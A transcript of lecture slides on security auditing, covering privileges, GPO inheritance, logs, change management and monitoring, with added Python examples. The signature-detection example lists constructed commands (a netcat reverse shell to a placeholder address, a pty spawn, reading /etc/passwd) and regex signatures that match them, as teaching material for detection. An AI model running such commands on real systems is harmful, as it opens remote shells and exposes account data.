10-Conducting Security Audits
Dr. John P. Abraham, Professor
UTPA
Privilege Auditing
• A person's (subject's) access level over an object
– A user should be given the minimal amount of privilege necessary to perform his or her function (least privilege)
• Privilege management
– The process of assigning and revoking privileges
– Assign based on Mandatory Access Control (MAC), Discretionary Access Control (DAC), Role-Based Access Control (RBAC) or Rule-Based Access Control (also abbreviated RBAC; the two models share the acronym) – see Ch 7
Auditing System Security Settings
• Regular review of user access rights, using group policies, and implementing storage and retention policies. See the policy on page 335, figure 10-1 (next slide).
Security+ Guide to Network Security Fundamentals, Third Edition
[Figure 10-1 from the textbook: shown as an image on the slide, not reproduced in the transcript]
Group policies
• Create a configuration baseline and deploy it using group policies. Review these policies regularly.
Storage and retention policies
• There are laws governing these
Auditing System Security Settings (continued)
• Storage and retention policies
– Information lifecycle management (ILM)
• A set of strategies for administering, maintaining, and managing computer storage systems in order to retain data
– ILM strategies are typically recorded in storage and retention policies
• These outline the requirements for data storage
• Data classification
– Assigns a level of business importance, availability, sensitivity, security and regulation requirements to data
Auditing System Security Settings (continued)
• Grouping data into categories often requires the assistance of the users who save and retrieve the data on a regular basis
• The next step is to assign the data to different levels or “tiers” of storage and accessibility
Usage Auditing
• Usage auditing
– Audits what objects a user has actually accessed
– Involves an examination of which subjects are accessing specific objects and how frequently
• Access privileges can sometimes be very complex
• Usage auditing can help reveal incorrect permissions
• Inheritance
– Permissions given to a higher-level "parent" are also inherited by a lower-level "child"
• Inheritance becomes more complicated with GPOs
Usage Auditing (continued)
• GPO inheritance
– Allows administrators to set a base security policy that applies to all users in the Microsoft Active Directory (AD) domain
• Other administrators can apply more specific policies at a lower level
– These apply only to subsets of users or computers
• GPOs inherited from parent containers are processed first, followed by the GPOs linked to the container object itself, in their link order
– Because a later-processed GPO overrides an earlier one where settings conflict, the most specific (lowest-level) container normally wins; when auditing effective rights, check the resolved policy, not just the policy linked to one container
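The processing order just described is easy to state and hard to audit by eye once a domain has a few layers of OUs. The following is an added example, not from the textbook or from Microsoft, that models the rule on a small made-up container tree: parent containers' GPOs are applied first, then each child's, and within one container the GPO with link order 1 is applied last (so it has the highest precedence, as in Active Directory). The container names, GPO names and settings are constructed for the demonstration; the point is the `overridden` report, which is what a usage audit would look at to find a child container quietly weakening a domain-wide setting.

```python
"""Resolve effective Group Policy settings for an object in a container tree.

Added example; not textbook or Microsoft code. Container and GPO names,
and the settings themselves, are made up for the demonstration.
"""
from dataclasses import dataclass, field


@dataclass
class GPO:
    name: str
    settings: dict                        # setting name -> value


@dataclass
class Container:
    name: str
    links: list = field(default_factory=list)   # GPOs in link order; index 0 = link order 1
    parent: "Container | None" = None


def processing_order(container):
    """GPOs in the order they are applied: root container first, then each
    child; within a container the lowest-precedence link is applied first so
    that link order 1 is applied last and wins any conflict."""
    chain = []
    node = container
    while node is not None:
        chain.append(node)
        node = node.parent
    order = []
    for node in reversed(chain):              # domain before OU before sub-OU
        order.extend(reversed(node.links))    # link order 1 applied last
    return order


def effective_settings(container):
    """Apply GPOs in processing order; a later GPO overrides an earlier value.
    Returns {setting: (value, gpo_name)} so the auditor sees which GPO won."""
    result = {}
    for gpo in processing_order(container):
        for key, value in gpo.settings.items():
            result[key] = (value, gpo.name)
    return result


def overridden(container):
    """Every (setting, overriding_gpo, overridden_gpo) where a later GPO changed
    a value set earlier: the list to review when inherited rights look wrong."""
    seen = {}
    changes = []
    for gpo in processing_order(container):
        for key, value in gpo.settings.items():
            if key in seen and seen[key][0] != value:
                changes.append((key, gpo.name, seen[key][1]))
            seen[key] = (value, gpo.name)
    return changes


def build_demo():
    """Constructed tree: domain -> OU=Servers -> OU=Dev."""
    domain = Container("example.local", links=[
        GPO("Default Domain Policy", {"MinPasswordLength": 8, "AuditLogon": "Success"}),
    ])
    servers = Container("OU=Servers", parent=domain, links=[
        GPO("Server Hardening", {"MinPasswordLength": 14, "AuditLogon": "Success,Failure"}),
        GPO("Legacy Exception", {"MinPasswordLength": 6}),   # link order 2: loses to link order 1
    ])
    dev = Container("OU=Dev", parent=servers, links=[
        GPO("Dev Overrides", {"AuditLogon": "None"}),        # child silently disables auditing
    ])
    return domain, servers, dev


if __name__ == "__main__":
    _, servers, dev = build_demo()
    for key, (value, source) in sorted(effective_settings(dev).items()):
        print(f"{key:18} = {value!s:16} (from {source})")
    for change in overridden(dev):
        print("override:", change)
```

Running it shows that a Dev OU member ends up with `AuditLogon = None` even though the domain and server policies both enable it, which is exactly the kind of inherited misconfiguration that a review of the linked policies alone would not reveal.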
Usage Auditing (continued)
• A log is a record of events that occur
• Logs are composed of log entries
– Each entry contains information related to a specific event that has occurred
• Logs have been used primarily for troubleshooting problems
• Log management
– The process for generating, transmitting, storing, analyzing, and disposing of computer security log data
Usage Auditing (continued)
• Security application logs
– Antivirus software
– Remote access software
– Automated patch update service
• Security hardware logs
– Network intrusion detection systems and host and network intrusion prevention systems
– Domain Name System (DNS) servers
– Authentication servers
– Proxy servers
– Firewalls
Usage Auditing (continued)
• Types of items that should be examined in a firewall log include:
– IP addresses whose packets are being rejected and dropped
– Probes to ports that have no application services running on them
– Source-routed packets
– Suspicious outbound connections
– Unsuccessful logins
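As an added example (not from the textbook or any firewall vendor), the script below runs four of these checks over a handful of constructed log lines. The lines use a simplified iptables-style `key=value` format behind a made-up `FW-<ACTION>` prefix, plus OpenSSH-style "Failed password" lines for the firewall's own management login; the internal address range, the set of ports that actually have services listening, and the allowed egress ports are assumptions. Source-routed packets are not checked here because that requires the IP options field, which this log format does not carry.

```python
"""Triage constructed firewall log lines for the items an auditor looks for.

Added example, not textbook or vendor code. Log format, addresses, port
sets and thresholds are all constructed/assumed for the demonstration.
"""
import ipaddress
import re
from collections import Counter, defaultdict

INTERNAL_NET = ipaddress.ip_network("10.0.0.0/8")     # assumption: our address space
LISTENING_PORTS = {22, 443}                            # assumption: services really exposed
ALLOWED_OUTBOUND_PORTS = {53, 80, 443}                 # assumption: normal egress

# Constructed sample log (not real traffic).
LOG = """\
Mar 10 02:14:01 fw kernel: FW-DROP IN=eth0 OUT= SRC=203.0.113.7 DST=10.0.0.5 PROTO=TCP SPT=40001 DPT=23
Mar 10 02:14:02 fw kernel: FW-DROP IN=eth0 OUT= SRC=203.0.113.7 DST=10.0.0.5 PROTO=TCP SPT=40002 DPT=3389
Mar 10 02:14:03 fw kernel: FW-DROP IN=eth0 OUT= SRC=203.0.113.7 DST=10.0.0.5 PROTO=TCP SPT=40003 DPT=445
Mar 10 02:14:04 fw kernel: FW-ACCEPT IN=eth0 OUT= SRC=198.51.100.2 DST=10.0.0.5 PROTO=TCP SPT=51000 DPT=443
Mar 10 02:15:10 fw kernel: FW-ACCEPT IN=eth1 OUT=eth0 SRC=10.0.0.23 DST=192.0.2.9 PROTO=TCP SPT=49152 DPT=4444
Mar 10 02:15:11 fw kernel: FW-ACCEPT IN=eth1 OUT=eth0 SRC=10.0.0.23 DST=192.0.2.9 PROTO=TCP SPT=49153 DPT=443
Mar 10 02:16:00 fw sshd[812]: Failed password for root from 203.0.113.7 port 55555 ssh2
Mar 10 02:16:03 fw sshd[812]: Failed password for admin from 203.0.113.7 port 55556 ssh2
"""

KV = re.compile(r"(\w+)=(\S*)")
FW_LINE = re.compile(r"kernel: FW-(?P<action>[A-Z]+) (?P<rest>.*)")
FAILED_LOGIN = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+)")


def parse(log_text):
    """Yield one dict per recognised line; unknown lines are skipped."""
    for line in log_text.splitlines():
        m = FW_LINE.search(line)
        if m:
            fields = dict(KV.findall(m.group("rest")))     # OUT= yields an empty string
            fields["ACTION"] = m.group("action")
            yield fields
            continue
        m = FAILED_LOGIN.search(line)
        if m:
            yield {"ACTION": "LOGIN_FAIL", "USER": m.group(1), "SRC": m.group(2)}


def triage(log_text, drop_threshold=3):
    """Return the findings for the four checks implemented here."""
    dropped_by_src = Counter()
    probed_ports = defaultdict(set)
    suspicious_outbound = []
    failed_logins = Counter()

    for ev in parse(log_text):
        src = ev.get("SRC")
        if ev["ACTION"] == "LOGIN_FAIL":
            failed_logins[src] += 1
            continue
        if ev["ACTION"] in ("DROP", "REJECT"):
            dropped_by_src[src] += 1
        dpt = int(ev["DPT"]) if "DPT" in ev else None
        inbound = ev.get("OUT", "") == ""            # no egress interface: destined to us
        if inbound and dpt is not None and dpt not in LISTENING_PORTS:
            probed_ports[src].add(dpt)               # a port nothing listens on
        if (not inbound and ev["ACTION"] == "ACCEPT"
                and ipaddress.ip_address(ev["DST"]) not in INTERNAL_NET
                and dpt not in ALLOWED_OUTBOUND_PORTS):
            suspicious_outbound.append((src, ev["DST"], dpt))

    return {
        "noisy_dropped_sources": {s: n for s, n in dropped_by_src.items() if n >= drop_threshold},
        "port_probes": {s: sorted(p) for s, p in probed_ports.items()},
        "suspicious_outbound": suspicious_outbound,
        "failed_logins": dict(failed_logins),
    }


if __name__ == "__main__":
    for finding, detail in triage(LOG).items():
        print(f"{finding}: {detail}")
```

On the sample data the same external address shows up in three of the four findings (dropped packets, probes of 23/445/3389, and failed management logins), which is the correlation across log categories that makes routine review worthwhile; the internal host's accepted connection to an external port 4444 is the kind of outbound event a permissive egress rule lets through and only the log reveals.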
Usage Auditing (continued)
• Operating system logs
– Event
• An occurrence within a software system that is communicated to users or other programs outside the operating system
– System events
• Operational actions that are performed by the operating system
Usage Auditing (continued)
• System events that are commonly recorded include:
– Client requests and server responses
– Usage information
• Logs based on audit records
– The second common type of security-related operating system logs
• Audit records that are commonly recorded include:
– Account information (for example, successful and failed authentication attempts and account changes)
– Operational information
Usage Auditing (continued)
• Log management benefits:
– A routine review and analysis of logs helps to identify security incidents, policy violations, fraudulent activity, and operational problems shortly after they have occurred
– Logs can also be used to provide information for resolving such problems
– Logs may be useful for performing auditing analysis, supporting the organization's internal investigations, and identifying operational trends and long-term problems
Usage Auditing (continued)
• It is recommended that organizations enact the following log management practices:
– Conduct periodic audits
– Establish policies and procedures for log management
– Maintain a secure log management infrastructure
– Prioritize log management throughout the organization
– Use log aggregators
– Provide adequate support
Usage Auditing (continued)
• Change management
– Refers to a methodology for making changes and keeping track of those changes, often manually
– Seeks to approach changes systematically and provide the necessary documentation of the changes
• Two major types of security-relevant changes are routinely documented
– Any change in system architecture
– Changes in data classification
Usage Auditing (continued)
• Change management team (CMT)
– Created to oversee changes
– Any proposed change must first be approved by the CMT
• The team is typically composed of:
– Representatives from all areas of IT (servers, network, enterprise server, etc.)
– Network security
– Upper-level management
Usage Auditing (continued)
• The duties of the CMT include:
– Review proposed changes
– Ensure that the risk and impact of the planned change is clearly understood
– Recommend approval, disapproval, deferral, or withdrawal of a requested change
– Communicate proposed and approved changes to co-workers
Monitoring Methodologies and Tools
• There are several types of instruments that can be used on systems and networks to detect security-related anomalies
Methodologies for Monitoring
• Anomaly-based monitoring
– Designed for detecting statistical anomalies
– Baseline
• A reference set of data against which operational data is compared
– Whenever there is a significant deviation from this baseline, an alarm is raised
• Advantage
– Detects anomalies quickly
Methodologies for Monitoring (continued)
• False positives
– Alarms that are raised when there is no actual abnormal behavior
• Normal behavior can change easily and even quickly
– Anomaly-based monitoring is therefore subject to false positives
Methodologies for Monitoring (continued)
• Signature-based monitoring
– Compares activities against a predefined signature
– Requires access to an updated database of signatures, along with a means to actively compare and match current behavior against the collection of signatures
• Weaknesses
– The signature databases must be constantly updated
– As the number of signatures grows, behaviors must be compared against an increasingly large number of signatures
– Activity that matches no signature (a new or modified attack) is not detected at all
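To make the trade-off between the anomaly-based method (previous slides) and the signature-based method concrete, here is an added example, not from the textbook, that runs both detectors over constructed data. The anomaly detector learns a mean and standard deviation from a baseline window of per-minute failed-login counts and alarms when a value deviates by more than `k` standard deviations; the baseline slides forward with every value judged normal, which is what lets "normal" change. The signature scanner matches command lines against a small set of regular expressions. The baseline values, the live stream (including a legitimate spike constructed to trigger a false positive), the command lines and the signatures are all constructed for the demonstration.

```python
"""Anomaly-based and signature-based monitoring side by side.

Added example, not textbook code. All data below is constructed.
"""
import re
import statistics

# Constructed: failed-login counts per minute on a quiet day (the baseline).
BASELINE_WINDOW = [2, 3, 1, 4, 2, 3, 2, 5, 3, 2, 4, 3]
# Constructed live stream: a brute-force burst (48, 61) and, later, 9 failures
# from a legitimate password-expiry morning: a false positive for this detector.
LIVE_STREAM = [3, 2, 4, 48, 61, 3, 9, 2]

# Constructed command lines observed on a host.
COMMANDS = [
    "ls -la /var/log",
    "cat /etc/passwd",
    "nc -e /bin/sh 192.0.2.9 4444",
    "tar czf backup.tgz /home",
    "python -c 'import pty;pty.spawn(\"/bin/bash\")'",
]


class AnomalyDetector:
    """Flag values more than k standard deviations from the baseline mean.

    Values judged normal are fed back into the sliding baseline, so the
    detector adapts to drift. That is also its weakness: a slow ramp-up
    is absorbed as the new normal, and a legitimate spike is alarmed on.
    """

    def __init__(self, baseline, k=3.0):
        self.window = list(baseline)
        self.k = k

    def check(self, value):
        mean = statistics.fmean(self.window)
        sd = statistics.pstdev(self.window) or 1.0    # guard a perfectly flat baseline
        anomalous = abs(value - mean) > self.k * sd
        if not anomalous:                            # only normal values update the baseline
            self.window.append(value)
            self.window.pop(0)
        return anomalous


def anomaly_scan(stream, baseline=BASELINE_WINDOW, k=3.0):
    """Indices in `stream` that the anomaly detector alarms on."""
    det = AnomalyDetector(baseline, k)
    return [i for i, v in enumerate(stream) if det.check(v)]


# Constructed signature set: name -> pattern. Anything not listed is invisible to it.
SIGNATURES = {
    "reverse-shell-netcat": re.compile(r"\bnc\b.*\s-e\s"),
    "pty-spawn": re.compile(r"pty\.spawn"),
    "passwd-read": re.compile(r"/etc/passwd"),
}


def signature_scan(commands, signatures=SIGNATURES):
    """(command, signature_name) for every command that matches a known pattern."""
    hits = []
    for cmd in commands:
        for name, pattern in signatures.items():
            if pattern.search(cmd):
                hits.append((cmd, name))
    return hits


if __name__ == "__main__":
    for i in anomaly_scan(LIVE_STREAM):
        print(f"anomaly at minute {i}: {LIVE_STREAM[i]} failed logins")
    for cmd, name in signature_scan(COMMANDS):
        print(f"signature {name}: {cmd}")
```

The anomaly detector catches the burst at minutes 3 and 4 without knowing anything about brute forcing, but also alarms on the harmless 9 at minute 6. The signature scanner has no false positive on this data, yet a reverse shell written as `nc -c` or with the `-e` flag placed differently would slip past its first pattern untouched, which is the maintenance burden the slide describes.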
Methodologies for Monitoring (continued)
• Behavior-based monitoring
– Designed to be more adaptive and proactive instead of reactive
– Uses the "normal" processes and actions as the standard
– Continuously analyzes the behavior of processes and programs on a system
• Alerts the user if it detects any abnormal actions
• Advantage
– Not necessary to update signature files or compile a baseline of statistical behavior
Monitoring Tools
• Performance baselines and monitors
– Performance baseline
• A reference set of data established to create the "norm" of performance for a system or systems
– Data is accumulated through the normal operations of the systems and networks through performance monitors
– Operational data is compared with the baseline data to determine how closely the norm is being met and if any adjustments need to be made
Monitoring Tools (continued)
• System monitor
– A low-level system program that uses a notification engine designed to monitor and track down hidden activity on a desktop system, server, or even a personal digital assistant (PDA) or cell phone
• Some system monitors have a Web-based interface
• System monitors generally have a fully customizable notification system
– This lets the owner design the information that is collected and made available
Monitoring Tools (continued)
• Protocol analyzer
– Also called a sniffer
– Captures each packet to decode and analyze its contents
– Can fully decode application-layer network protocols
– The different parts of the protocol can be analyzed for any suspicious behavior
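"Decode and analyze its contents" is what a sniffer does layer by layer, and doing one packet by hand shows where the analysis hooks in. The following is an added example, not from the textbook or from any sniffer's source code: it parses the IPv4 and TCP headers of a raw packet with `struct`, then applies three simple checks to the decoded fields (IP options present, data on a bare SYN, cleartext HTTP). The packet bytes are constructed in the script itself so it runs offline; on a live system the same decoder would be fed frames from a raw socket or a capture file, which is deliberately left out.

```python
"""Decode an IPv4/TCP packet the way a protocol analyzer does.

Added example, not textbook or sniffer code. The sample packet is
constructed below; addresses and payload are made up.
"""
import ipaddress
import struct

TCP_FLAGS = {0x01: "FIN", 0x02: "SYN", 0x04: "RST", 0x08: "PSH", 0x10: "ACK", 0x20: "URG"}


def decode_ipv4(data):
    """Parse the IPv4 header; return (fields, payload)."""
    if len(data) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, total_len, _ident, _flags_frag, ttl, proto, _csum, src, dst = struct.unpack(
        "!BBHHHBBH4s4s", data[:20])
    version, ihl = ver_ihl >> 4, (ver_ihl & 0x0F) * 4
    if version != 4 or ihl < 20 or len(data) < ihl:
        raise ValueError("not a well-formed IPv4 header")
    fields = {
        "src": str(ipaddress.IPv4Address(src)),
        "dst": str(ipaddress.IPv4Address(dst)),
        "ttl": ttl,
        "proto": proto,
        "total_len": total_len,
        "options": data[20:ihl],      # non-empty options (e.g. source routing) deserve a look
    }
    return fields, data[ihl:total_len]


def decode_tcp(segment):
    """Parse the TCP header; return (fields, payload)."""
    if len(segment) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, seq, ack, off_flags, window, _csum, _urg = struct.unpack("!HHIIHHHH", segment[:20])
    data_offset = (off_flags >> 12) * 4
    flag_bits = off_flags & 0x01FF
    flags = [name for bit, name in TCP_FLAGS.items() if flag_bits & bit]
    fields = {"sport": sport, "dport": dport, "seq": seq, "ack": ack, "flags": flags, "window": window}
    return fields, segment[data_offset:]


def analyze(packet):
    """Full decode plus the checks an analyst would apply to the decoded parts."""
    ip, ip_payload = decode_ipv4(packet)
    report = {"ip": ip, "findings": []}
    if ip["options"]:
        report["findings"].append("ip-options-present")
    if ip["proto"] == 6:                                   # TCP
        tcp, payload = decode_tcp(ip_payload)
        report["tcp"], report["payload"] = tcp, payload
        if "SYN" in tcp["flags"] and "ACK" not in tcp["flags"] and payload:
            report["findings"].append("data-on-bare-syn")  # unusual for a legitimate client
        if payload.startswith((b"GET ", b"POST ")):
            report["findings"].append("cleartext-http")    # application layer visible to anyone sniffing
    return report


def build_packet(src="10.0.0.23", dst="192.0.2.9", sport=49152, dport=80,
                 flags=0x18, payload=b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"):
    """Constructed sample: IPv4 header without options, TCP header (default PSH+ACK),
    HTTP payload. Checksums are left at zero; the decoder does not verify them."""
    tcp_hdr = struct.pack("!HHIIHHHH", sport, dport, 1000, 2000, (5 << 12) | flags, 65535, 0, 0)
    total_len = 20 + len(tcp_hdr) + len(payload)
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 1, 0x4000, 64, 6, 0,
                         ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return ip_hdr + tcp_hdr + payload


if __name__ == "__main__":
    result = analyze(build_packet())
    print(result["ip"]["src"], "->", result["ip"]["dst"], result["tcp"]["flags"], result["findings"])
    print(result["payload"].decode("ascii", "replace"))
```

Each layer is decoded independently and hands its payload to the next, which is why a real analyzer can keep adding dissectors on top; the `findings` list is where the "analyze for suspicious behavior" step lives, and the cleartext HTTP finding is a reminder that the sniffer sees exactly what an attacker on the same segment would see.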
Summary
• A “privilege” can be considered a subject’s access level over an object
• Auditing system security settings for user privileges involves a regular review of user access and rights
• Information lifecycle management (ILM) is a set of strategies for administering, maintaining, and managing computer storage systems in order to retain data
• Usage auditing involves an examination of which subjects are accessing specific objects and how frequently
Summary (continued)
• Logs related to computer security have become particularly important
• Change management refers to a methodology for making changes and keeping track of those changes, often manually
• Monitoring involves examining network traffic, activity, transactions, or behavior in order to detect security-related anomalies